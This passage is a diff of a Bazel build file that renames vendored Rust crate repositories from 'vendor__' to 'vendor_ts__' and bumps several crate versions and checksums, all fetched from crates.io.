@@ -2504,17 +2535,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ryu-1.0.18", - sha256 = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f", + name = "vendor_ts__ryu-1.0.19", + sha256 = "6ea1a2d0a644769cc99faa24c3ad26b379b786fe7c36fd3c546254801650e6dd", type = "tar.gz", - urls = ["https://static.crates.io/crates/ryu/1.0.18/download"], - strip_prefix = "ryu-1.0.18", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ryu-1.0.18.bazel"), + urls = ["https://static.crates.io/crates/ryu/1.0.19/download"], + strip_prefix = "ryu-1.0.19", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ryu-1.0.19.bazel"), ) maybe( http_archive, - name = "vendor__same-file-1.0.6", + name = "vendor_ts__same-file-1.0.6", sha256 = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502", type = "tar.gz", urls = ["https://static.crates.io/crates/same-file/1.0.6/download"], @@ -2524,7 +2555,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__scoped-tls-1.0.1", + name = "vendor_ts__scoped-tls-1.0.1", sha256 = "e1cf6437eb19a8f4a6cc0f7dca544973b0b78843adbfeb3683d1a94a0024a294", type = "tar.gz", urls = ["https://static.crates.io/crates/scoped-tls/1.0.1/download"], @@ -2534,7 +2565,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__scopeguard-1.2.0", + name = "vendor_ts__scopeguard-1.2.0", sha256 = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49", type = "tar.gz", urls = ["https://static.crates.io/crates/scopeguard/1.2.0/download"], @@ -2544,7 +2575,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__semver-1.0.24", + name = "vendor_ts__semver-1.0.24", sha256 = "3cb6eb87a131f756572d7fb904f6e7b68633f09cca868c5df1c4b8d1a694bbba", type = "tar.gz", urls = ["https://static.crates.io/crates/semver/1.0.24/download"], 
@@ -2554,37 +2585,37 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde-1.0.217", - sha256 = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70", + name = "vendor_ts__serde-1.0.218", + sha256 = "e8dfc9d19bdbf6d17e22319da49161d5d0108e4188e8b680aef6299eed22df60", type = "tar.gz", - urls = ["https://static.crates.io/crates/serde/1.0.217/download"], - strip_prefix = "serde-1.0.217", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde-1.0.217.bazel"), + urls = ["https://static.crates.io/crates/serde/1.0.218/download"], + strip_prefix = "serde-1.0.218", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde-1.0.218.bazel"), ) maybe( http_archive, - name = "vendor__serde_derive-1.0.217", - sha256 = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0", + name = "vendor_ts__serde_derive-1.0.218", + sha256 = "f09503e191f4e797cb8aac08e9a4a4695c5edf6a2e70e376d961ddd5c969f82b", type = "tar.gz", - urls = ["https://static.crates.io/crates/serde_derive/1.0.217/download"], - strip_prefix = "serde_derive-1.0.217", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_derive-1.0.217.bazel"), + urls = ["https://static.crates.io/crates/serde_derive/1.0.218/download"], + strip_prefix = "serde_derive-1.0.218", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_derive-1.0.218.bazel"), ) maybe( http_archive, - name = "vendor__serde_json-1.0.135", - sha256 = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9", + name = "vendor_ts__serde_json-1.0.139", + sha256 = "44f86c3acccc9c65b153fe1b85a3be07fe5515274ec9f0653b4a0875731c72a6", type = "tar.gz", - urls = ["https://static.crates.io/crates/serde_json/1.0.135/download"], - strip_prefix = "serde_json-1.0.135", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_json-1.0.135.bazel"), + urls = 
["https://static.crates.io/crates/serde_json/1.0.139/download"], + strip_prefix = "serde_json-1.0.139", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_json-1.0.139.bazel"), ) maybe( http_archive, - name = "vendor__serde_spanned-0.6.8", + name = "vendor_ts__serde_spanned-0.6.8", sha256 = "87607cb1398ed59d48732e575a4c28a7a8ebf2454b964fe3f224f2afc07909e1", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_spanned/0.6.8/download"], @@ -2594,7 +2625,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde_with-3.12.0", + name = "vendor_ts__serde_with-3.12.0", sha256 = "d6b6f7f2fcb69f747921f79f3926bd1e203fce4fef62c268dd3abfb6d86029aa", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_with/3.12.0/download"], @@ -2604,7 +2635,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde_with_macros-3.12.0", + name = "vendor_ts__serde_with_macros-3.12.0", sha256 = "8d00caa5193a3c8362ac2b73be6b9e768aa5a4b2f721d8f4b339600c3cb51f8e", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_with_macros/3.12.0/download"], @@ -2614,7 +2645,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde_yaml-0.9.34-deprecated", + name = "vendor_ts__serde_yaml-0.9.34-deprecated", sha256 = "6a8b1a1a2ebf674015cc02edccce75287f1a0130d394307b36743c2f5d504b47", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_yaml/0.9.34+deprecated/download"], @@ -2624,7 +2655,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__sharded-slab-0.1.7", + name = "vendor_ts__sharded-slab-0.1.7", sha256 = "f40ca3c46823713e0d4209592e8d6e826aa57e928f09752619fc696c499637f6", type = "tar.gz", urls = ["https://static.crates.io/crates/sharded-slab/0.1.7/download"], 
@@ -2634,7 +2665,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__shlex-1.3.0", + name = "vendor_ts__shlex-1.3.0", sha256 = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64", type = "tar.gz", urls = ["https://static.crates.io/crates/shlex/1.3.0/download"], @@ -2644,17 +2675,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__smallvec-1.13.2", - sha256 = "3c5e1a9a646d36c3599cd173a41282daf47c44583ad367b8e6837255952e5c67", + name = "vendor_ts__smallvec-1.14.0", + sha256 = "7fcf8323ef1faaee30a44a340193b1ac6814fd9b7b4e88e9d4519a3e4abe1cfd", type = "tar.gz", - urls = ["https://static.crates.io/crates/smallvec/1.13.2/download"], - strip_prefix = "smallvec-1.13.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.smallvec-1.13.2.bazel"), + urls = ["https://static.crates.io/crates/smallvec/1.14.0/download"], + strip_prefix = "smallvec-1.14.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.smallvec-1.14.0.bazel"), ) maybe( http_archive, - name = "vendor__smol_str-0.3.2", + name = "vendor_ts__smol_str-0.3.2", sha256 = "9676b89cd56310a87b93dec47b11af744f34d5fc9f367b829474eec0a891350d", type = "tar.gz", urls = ["https://static.crates.io/crates/smol_str/0.3.2/download"], @@ -2664,17 +2695,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__sptr-0.3.2", - sha256 = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a", - type = "tar.gz", - urls = ["https://static.crates.io/crates/sptr/0.3.2/download"], - strip_prefix = "sptr-0.3.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.sptr-0.3.2.bazel"), - ) - - maybe( - http_archive, - name = "vendor__stable_deref_trait-1.2.0", + name = "vendor_ts__stable_deref_trait-1.2.0", sha256 = "a8f112729512f8e442d81f95a8a7ddf2b7c6b8a1a6f509a95864142b30cab2d3", type = "tar.gz", urls = ["https://static.crates.io/crates/stable_deref_trait/1.2.0/download"], 
@@ -2684,7 +2705,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__streaming-iterator-0.1.9", + name = "vendor_ts__streaming-iterator-0.1.9", sha256 = "2b2231b7c3057d5e4ad0156fb3dc807d900806020c5ffa3ee6ff2c8c76fb8520", type = "tar.gz", urls = ["https://static.crates.io/crates/streaming-iterator/0.1.9/download"], @@ -2694,7 +2715,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__strsim-0.11.1", + name = "vendor_ts__strsim-0.11.1", sha256 = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f", type = "tar.gz", urls = ["https://static.crates.io/crates/strsim/0.11.1/download"], @@ -2704,17 +2725,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__syn-2.0.96", - sha256 = "d5d0adab1ae378d7f53bdebc67a39f1f151407ef230f0ce2883572f5d8985c80", + name = "vendor_ts__syn-2.0.98", + sha256 = "36147f1a48ae0ec2b5b3bc5b537d267457555a10dc06f3dbc8cb11ba3006d3b1", type = "tar.gz", - urls = ["https://static.crates.io/crates/syn/2.0.96/download"], - strip_prefix = "syn-2.0.96", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.syn-2.0.96.bazel"), + urls = ["https://static.crates.io/crates/syn/2.0.98/download"], + strip_prefix = "syn-2.0.98", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.syn-2.0.98.bazel"), ) maybe( http_archive, - name = "vendor__synstructure-0.13.1", + name = "vendor_ts__synstructure-0.13.1", sha256 = "c8af7666ab7b6390ab78131fb5b0fce11d6b7a6951602017c35fa82800708971", type = "tar.gz", urls = ["https://static.crates.io/crates/synstructure/0.13.1/download"], @@ -2724,7 +2745,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__text-size-1.1.1", + name = "vendor_ts__text-size-1.1.1", sha256 = "f18aa187839b2bdb1ad2fa35ead8c4c2976b64e4363c386d45ac0f7ee85c9233", type = "tar.gz", urls = ["https://static.crates.io/crates/text-size/1.1.1/download"], 
@@ -2734,7 +2755,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__thiserror-1.0.69", + name = "vendor_ts__thiserror-1.0.69", sha256 = "b6aaf5339b578ea85b50e080feb250a3e8ae8cfcdff9a461c9ec2904bc923f52", type = "tar.gz", urls = ["https://static.crates.io/crates/thiserror/1.0.69/download"], @@ -2744,7 +2765,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__thiserror-impl-1.0.69", + name = "vendor_ts__thiserror-impl-1.0.69", sha256 = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1", type = "tar.gz", urls = ["https://static.crates.io/crates/thiserror-impl/1.0.69/download"], @@ -2754,7 +2775,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__thread_local-1.1.8", + name = "vendor_ts__thread_local-1.1.8", sha256 = "8b9ef9bad013ada3808854ceac7b46812a6465ba368859a37e2100283d2d719c", type = "tar.gz", urls = ["https://static.crates.io/crates/thread_local/1.1.8/download"], @@ -2764,7 +2785,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__time-0.3.37", + name = "vendor_ts__time-0.3.37", sha256 = "35e7868883861bd0e56d9ac6efcaaca0d6d5d82a2a7ec8209ff492c07cf37b21", type = "tar.gz", urls = ["https://static.crates.io/crates/time/0.3.37/download"], @@ -2774,7 +2795,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__time-core-0.1.2", + name = "vendor_ts__time-core-0.1.2", sha256 = "ef927ca75afb808a4d64dd374f00a2adf8d0fcff8e7b184af886c3c87ec4a3f3", type = "tar.gz", urls = ["https://static.crates.io/crates/time-core/0.1.2/download"], @@ -2784,7 +2805,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__time-macros-0.2.19", + name = "vendor_ts__time-macros-0.2.19", sha256 = "2834e6017e3e5e4b9834939793b282bc03b37a3336245fa820e35e233e2a85de", type = "tar.gz", urls = ["https://static.crates.io/crates/time-macros/0.2.19/download"], 
@@ -2794,17 +2815,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__toml-0.8.19", - sha256 = "a1ed1f98e3fdc28d6d910e6737ae6ab1a93bf1985935a1193e68f93eeb68d24e", + name = "vendor_ts__toml-0.8.20", + sha256 = "cd87a5cdd6ffab733b2f74bc4fd7ee5fff6634124999ac278c35fc78c6120148", type = "tar.gz", - urls = ["https://static.crates.io/crates/toml/0.8.19/download"], - strip_prefix = "toml-0.8.19", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml-0.8.19.bazel"), + urls = ["https://static.crates.io/crates/toml/0.8.20/download"], + strip_prefix = "toml-0.8.20", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml-0.8.20.bazel"), ) maybe( http_archive, - name = "vendor__toml_datetime-0.6.8", + name = "vendor_ts__toml_datetime-0.6.8", sha256 = "0dd7358ecb8fc2f8d014bf86f6f638ce72ba252a2c3a2572f2a795f1d23efb41", type = "tar.gz", urls = ["https://static.crates.io/crates/toml_datetime/0.6.8/download"], @@ -2814,17 +2835,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__toml_edit-0.22.22", - sha256 = "4ae48d6208a266e853d946088ed816055e556cc6028c5e8e2b84d9fa5dd7c7f5", + name = "vendor_ts__toml_edit-0.22.24", + sha256 = "17b4795ff5edd201c7cd6dca065ae59972ce77d1b80fa0a84d94950ece7d1474", type = "tar.gz", - urls = ["https://static.crates.io/crates/toml_edit/0.22.22/download"], - strip_prefix = "toml_edit-0.22.22", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml_edit-0.22.22.bazel"), + urls = ["https://static.crates.io/crates/toml_edit/0.22.24/download"], + strip_prefix = "toml_edit-0.22.24", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml_edit-0.22.24.bazel"), ) maybe( http_archive, - name = "vendor__tracing-0.1.41", + name = "vendor_ts__tracing-0.1.41", sha256 = "784e0ac535deb450455cbfa28a6f0df145ea1bb7ae51b821cf5e7927fdcfbdd0", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing/0.1.41/download"], 
@@ -2834,7 +2855,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-attributes-0.1.28", + name = "vendor_ts__tracing-attributes-0.1.28", sha256 = "395ae124c09f9e6918a2310af6038fba074bcf474ac352496d5910dd59a2226d", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-attributes/0.1.28/download"], @@ -2844,7 +2865,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-core-0.1.33", + name = "vendor_ts__tracing-core-0.1.33", sha256 = "e672c95779cf947c5311f83787af4fa8fffd12fb27e4993211a84bdfd9610f9c", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-core/0.1.33/download"], @@ -2854,7 +2875,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-flame-0.2.0", + name = "vendor_ts__tracing-flame-0.2.0", sha256 = "0bae117ee14789185e129aaee5d93750abe67fdc5a9a62650452bfe4e122a3a9", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-flame/0.2.0/download"], @@ -2864,7 +2885,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-log-0.2.0", + name = "vendor_ts__tracing-log-0.2.0", sha256 = "ee855f1f400bd0e5c02d150ae5de3840039a3f54b025156404e34c23c03f47c3", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-log/0.2.0/download"], @@ -2874,7 +2895,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-subscriber-0.3.19", + name = "vendor_ts__tracing-subscriber-0.3.19", sha256 = "e8189decb5ac0fa7bc8b96b7cb9b2701d60d48805aca84a238004d665fcc4008", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-subscriber/0.3.19/download"], @@ -2884,7 +2905,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-0.24.6", + name = "vendor_ts__tree-sitter-0.24.6", sha256 = "5f2434c86ba59ed15af56039cc5bf1acf8ba76ce301e32ef08827388ef285ec5", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter/0.24.6/download"], 
@@ -2894,7 +2915,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-embedded-template-0.23.2", + name = "vendor_ts__tree-sitter-embedded-template-0.23.2", sha256 = "790063ef14e5b67556abc0b3be0ed863fb41d65ee791cf8c0b20eb42a1fa46af", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-embedded-template/0.23.2/download"], @@ -2904,7 +2925,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-json-0.24.8", + name = "vendor_ts__tree-sitter-json-0.24.8", sha256 = "4d727acca406c0020cffc6cf35516764f36c8e3dc4408e5ebe2cb35a947ec471", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-json/0.24.8/download"], @@ -2914,7 +2935,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-language-0.1.3", + name = "vendor_ts__tree-sitter-language-0.1.3", sha256 = "c199356c799a8945965bb5f2c55b2ad9d9aa7c4b4f6e587fe9dea0bc715e5f9c", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-language/0.1.3/download"], @@ -2924,7 +2945,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-ql-0.23.1", + name = "vendor_ts__tree-sitter-ql-0.23.1", sha256 = "80b7bcaf39acefbb199417a6ec2fd0c038083ba115da3e4f4426c820dc76d386", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-ql/0.23.1/download"], @@ -2934,7 +2955,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-ruby-0.23.1", + name = "vendor_ts__tree-sitter-ruby-0.23.1", sha256 = "be0484ea4ef6bb9c575b4fdabde7e31340a8d2dbc7d52b321ac83da703249f95", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-ruby/0.23.1/download"], 
@@ -2944,7 +2965,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__triomphe-0.1.14", + name = "vendor_ts__triomphe-0.1.14", sha256 = "ef8f7726da4807b58ea5c96fdc122f80702030edc33b35aff9190a51148ccc85", type = "tar.gz", urls = ["https://static.crates.io/crates/triomphe/0.1.14/download"], @@ -2954,7 +2975,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__typed-arena-2.0.2", + name = "vendor_ts__typed-arena-2.0.2", sha256 = "6af6ae20167a9ece4bcb41af5b80f8a1f1df981f6391189ce00fd257af04126a", type = "tar.gz", urls = ["https://static.crates.io/crates/typed-arena/2.0.2/download"], @@ -2964,7 +2985,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__uncased-0.9.10", + name = "vendor_ts__uncased-0.9.10", sha256 = "e1b88fcfe09e89d3866a5c11019378088af2d24c3fbd4f0543f96b479ec90697", type = "tar.gz", urls = ["https://static.crates.io/crates/uncased/0.9.10/download"], @@ -2974,7 +2995,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ungrammar-1.16.1", + name = "vendor_ts__ungrammar-1.16.1", sha256 = "a3e5df347f0bf3ec1d670aad6ca5c6a1859cd9ea61d2113125794654ccced68f", type = "tar.gz", urls = ["https://static.crates.io/crates/ungrammar/1.16.1/download"], 
@@ -2984,17 +3005,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__unicode-ident-1.0.14", - sha256 = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83", + name = "vendor_ts__unicode-ident-1.0.16", + sha256 = "a210d160f08b701c8721ba1c726c11662f877ea6b7094007e1ca9a1041945034", type = "tar.gz", - urls = ["https://static.crates.io/crates/unicode-ident/1.0.14/download"], - strip_prefix = "unicode-ident-1.0.14", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.unicode-ident-1.0.14.bazel"), + urls = ["https://static.crates.io/crates/unicode-ident/1.0.16/download"], + strip_prefix = "unicode-ident-1.0.16", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.unicode-ident-1.0.16.bazel"), ) maybe( http_archive, - name = "vendor__unicode-properties-0.1.3", + name = "vendor_ts__unicode-properties-0.1.3", sha256 = "e70f2a8b45122e719eb623c01822704c4e0907e7e426a05927e1a1cfff5b75d0", type = "tar.gz", urls = ["https://static.crates.io/crates/unicode-properties/0.1.3/download"], @@ -3004,7 +3025,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__unicode-xid-0.2.6", + name = "vendor_ts__unicode-xid-0.2.6", sha256 = "ebc1c04c71510c7f702b52b7c350734c9ff1295c464a03335b00bb84fc54f853", type = "tar.gz", urls = ["https://static.crates.io/crates/unicode-xid/0.2.6/download"], @@ -3014,7 +3035,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__unsafe-libyaml-0.2.11", + name = "vendor_ts__unsafe-libyaml-0.2.11", sha256 = "673aac59facbab8a9007c7f6108d11f63b603f7cabff99fabf650fea5c32b861", type = "tar.gz", urls = ["https://static.crates.io/crates/unsafe-libyaml/0.2.11/download"], 
@@ -3024,7 +3045,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__utf8parse-0.2.2", + name = "vendor_ts__utf8parse-0.2.2", sha256 = "06abde3611657adf66d383f00b093d7faecc7fa57071cce2578660c9f1010821", type = "tar.gz", urls = ["https://static.crates.io/crates/utf8parse/0.2.2/download"], @@ -3034,7 +3055,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__valuable-0.1.0", + name = "vendor_ts__valuable-0.1.0", sha256 = "830b7e5d4d90034032940e4ace0d9a9a057e7a45cd94e6c007832e39edb82f6d", type = "tar.gz", urls = ["https://static.crates.io/crates/valuable/0.1.0/download"], @@ -3044,7 +3065,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__version_check-0.9.5", + name = "vendor_ts__version_check-0.9.5", sha256 = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a", type = "tar.gz", urls = ["https://static.crates.io/crates/version_check/0.9.5/download"], @@ -3054,7 +3075,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__walkdir-2.5.0", + name = "vendor_ts__walkdir-2.5.0", sha256 = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b", type = "tar.gz", urls = ["https://static.crates.io/crates/walkdir/2.5.0/download"], @@ -3064,7 +3085,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasi-0.11.0-wasi-snapshot-preview1", + name = "vendor_ts__wasi-0.11.0-wasi-snapshot-preview1", sha256 = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423", type = "tar.gz", urls = ["https://static.crates.io/crates/wasi/0.11.0+wasi-snapshot-preview1/download"], 
@@ -3074,7 +3095,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-0.2.99", + name = "vendor_ts__wasi-0.13.3-wasi-0.2.2", + sha256 = "26816d2e1a4a36a2940b96c5296ce403917633dff8f3440e9b236ed6f6bacad2", + type = "tar.gz", + urls = ["https://static.crates.io/crates/wasi/0.13.3+wasi-0.2.2/download"], + strip_prefix = "wasi-0.13.3+wasi-0.2.2", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.wasi-0.13.3+wasi-0.2.2.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__wasm-bindgen-0.2.99", sha256 = "a474f6281d1d70c17ae7aa6a613c87fce69a127e2624002df63dcb39d6cf6396", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen/0.2.99/download"], @@ -3084,7 +3115,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-backend-0.2.99", + name = "vendor_ts__wasm-bindgen-backend-0.2.99", sha256 = "5f89bb38646b4f81674e8f5c3fb81b562be1fd936d84320f3264486418519c79", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-backend/0.2.99/download"], @@ -3094,7 +3125,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-macro-0.2.99", + name = "vendor_ts__wasm-bindgen-macro-0.2.99", sha256 = "2cc6181fd9a7492eef6fef1f33961e3695e4579b9872a6f7c83aee556666d4fe", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-macro/0.2.99/download"], @@ -3104,7 +3135,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-macro-support-0.2.99", + name = "vendor_ts__wasm-bindgen-macro-support-0.2.99", sha256 = "30d7a95b763d3c45903ed6c81f156801839e5ee968bb07e534c44df0fcd330c2", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-macro-support/0.2.99/download"], 
@@ -3114,7 +3145,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__wasm-bindgen-shared-0.2.99", + name = "vendor_ts__wasm-bindgen-shared-0.2.99", sha256 = "943aab3fdaaa029a6e0271b35ea10b72b943135afe9bffca82384098ad0e06a6", type = "tar.gz", urls = ["https://static.crates.io/crates/wasm-bindgen-shared/0.2.99/download"], @@ -3124,7 +3155,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-0.3.9", + name = "vendor_ts__winapi-0.3.9", sha256 = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi/0.3.9/download"], @@ -3134,7 +3165,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-i686-pc-windows-gnu-0.4.0", + name = "vendor_ts__winapi-i686-pc-windows-gnu-0.4.0", sha256 = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi-i686-pc-windows-gnu/0.4.0/download"], @@ -3144,7 +3175,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-util-0.1.9", + name = "vendor_ts__winapi-util-0.1.9", sha256 = "cf221c93e13a30d793f7645a0e7762c55d169dbb0a49671918a2319d289b10bb", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi-util/0.1.9/download"], @@ -3154,7 +3185,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__winapi-x86_64-pc-windows-gnu-0.4.0", + name = "vendor_ts__winapi-x86_64-pc-windows-gnu-0.4.0", sha256 = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f", type = "tar.gz", urls = ["https://static.crates.io/crates/winapi-x86_64-pc-windows-gnu/0.4.0/download"], @@ -3164,7 +3195,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-core-0.52.0", + name = "vendor_ts__windows-core-0.52.0", sha256 = "33ab640c8d7e35bf8ba19b884ba838ceb4fba93a4e8c65a9059d08afcfc683d9", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-core/0.52.0/download"], 
@@ -3174,7 +3205,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-sys-0.48.0", + name = "vendor_ts__windows-sys-0.48.0", sha256 = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-sys/0.48.0/download"], @@ -3184,7 +3215,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-sys-0.52.0", + name = "vendor_ts__windows-sys-0.52.0", sha256 = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-sys/0.52.0/download"], @@ -3194,7 +3225,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-sys-0.59.0", + name = "vendor_ts__windows-sys-0.59.0", sha256 = "1e38bc4d79ed67fd075bcc251a1c39b32a1776bbe92e5bef1f0bf1f8c531853b", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-sys/0.59.0/download"], @@ -3204,7 +3235,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-targets-0.48.5", + name = "vendor_ts__windows-targets-0.48.5", sha256 = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-targets/0.48.5/download"], @@ -3214,7 +3245,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows-targets-0.52.6", + name = "vendor_ts__windows-targets-0.52.6", sha256 = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973", type = "tar.gz", urls = ["https://static.crates.io/crates/windows-targets/0.52.6/download"], @@ -3224,7 +3255,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__windows_aarch64_gnullvm-0.48.5", + name = "vendor_ts__windows_aarch64_gnullvm-0.48.5", sha256 = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8", type = "tar.gz", urls = ["https://static.crates.io/crates/windows_aarch64_gnullvm/0.48.5/download"], 
